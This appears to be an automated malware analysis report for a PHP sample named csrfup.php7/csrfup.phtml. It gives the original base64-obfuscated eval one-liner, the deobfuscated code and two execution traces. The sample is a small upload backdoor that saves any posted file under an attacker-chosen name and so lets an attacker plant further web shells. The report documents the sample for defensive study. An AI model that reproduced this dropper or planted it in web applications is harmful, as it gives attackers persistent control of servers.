PHP Malware Analysis

csrfup.php7, csrfup.phtml

md5: 77ca34ad5ae79c852637524a670fc2f9

Attributes

Encoding

Execution

Files

Input


Deobfuscated PHP code

<?php

echo eval /* PHPDeobfuscator eval output */ {
    if ($_POST) {
        if (@copy($_FILES["354"]["tmp_name"], $_FILES["354"]["name"])) {
            echo "Y";
        } else {
            echo "N";
        }
    } else {
        echo "";
    }
};

Execution traces

data/traces/77ca34ad5ae79c852637524a670fc2f9_trace-1676250918.5804.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:15:44.478243]
1	0	1	0.000233	393528
1	3	0	0.000285	393640	{main}	1		/var/www/html/uploads/csrfup.php7	0	0
2	4	0	0.000303	393640	base64_decode	0		/var/www/html/uploads/csrfup.php7	1	1	'PD9waHAgaWYoJF9QT1NUKXtpZihAY29weSgkX0ZJTEVTWyIzNTQiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyIzNTQiXVsibmFtZSJdKSl7ZWNobyJZIjt9ZWxzZXtlY2hvIk4iO319ZWxzZXtlY2hvIiI7fT8+'
2	4	1	0.000328	393864
2	4	R			'<?php if($_POST){if(@copy($_FILES["354"]["tmp_name"],$_FILES["354"]["name"])){echo"Y";}else{echo"N";}}else{echo"";}?>'
2	5	0	0.000373	396032	eval	1	'?><?php if($_POST){if(@copy($_FILES["354"]["tmp_name"],$_FILES["354"]["name"])){echo"Y";}else{echo"N";}}else{echo"";}?>'	/var/www/html/uploads/csrfup.php7	1	0
2	5	1	0.000394	396032
2	5	R			NULL
1	3	1	0.000408	394392
			0.000440	314400
TRACE END   [2023-02-12 23:15:44.478499]

data/traces/77ca34ad5ae79c852637524a670fc2f9_trace-1676261426.3122.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:10:52.210041]
1	0	1	0.000154	393528
1	3	0	0.000203	393640	{main}	1		/var/www/html/uploads/csrfup.phtml	0	0
2	4	0	0.000220	393640	base64_decode	0		/var/www/html/uploads/csrfup.phtml	1	1	'PD9waHAgaWYoJF9QT1NUKXtpZihAY29weSgkX0ZJTEVTWyIzNTQiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyIzNTQiXVsibmFtZSJdKSl7ZWNobyJZIjt9ZWxzZXtlY2hvIk4iO319ZWxzZXtlY2hvIiI7fT8+'
2	4	1	0.000244	393864
2	4	R			'<?php if($_POST){if(@copy($_FILES["354"]["tmp_name"],$_FILES["354"]["name"])){echo"Y";}else{echo"N";}}else{echo"";}?>'
2	5	0	0.000284	396032	eval	1	'?><?php if($_POST){if(@copy($_FILES["354"]["tmp_name"],$_FILES["354"]["name"])){echo"Y";}else{echo"N";}}else{echo"";}?>'	/var/www/html/uploads/csrfup.phtml	1	0
2	5	1	0.000304	396032
2	5	R			NULL
1	3	1	0.000318	394392
			0.000346	314400
TRACE END   [2023-02-13 02:10:52.210266]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?=eval("?>".base64_decode("PD9waHAgaWYoJF9QT1NUKXtpZihAY29weSgkX0ZJTEVTWyIzNTQiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyIzNTQiXVsibmFtZSJdKSl7ZWNobyJZIjt9ZWxzZXtlY2hvIk4iO319ZWxzZXtlY2hvIiI7fT8+"));?>